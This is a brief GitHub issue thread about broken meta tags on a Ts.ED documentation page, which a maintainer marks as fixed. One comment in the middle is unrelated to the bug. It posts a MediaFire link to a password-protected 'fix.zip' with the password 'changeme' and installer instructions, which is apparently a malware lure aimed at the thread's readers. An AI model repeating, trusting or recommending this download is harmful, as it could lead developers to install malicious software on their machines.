### ISSUE TITLE
[BUG] Miscellanous 

### ISSUE THREAD

**Issue by LorianeE** [tsedio/tsed-website#93]
- [ ] https://beta.tsed.dev/docs/services.html : <[object Object] name="description" content="Create your first controller. Ts.ED is built on top of Express and uses TypeScript language."> <[object Object] name="keywords" content="controller getting started ts.ed express typescript node.js javascript decorators mvc class models">

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Romakita** [comment]
Fixed
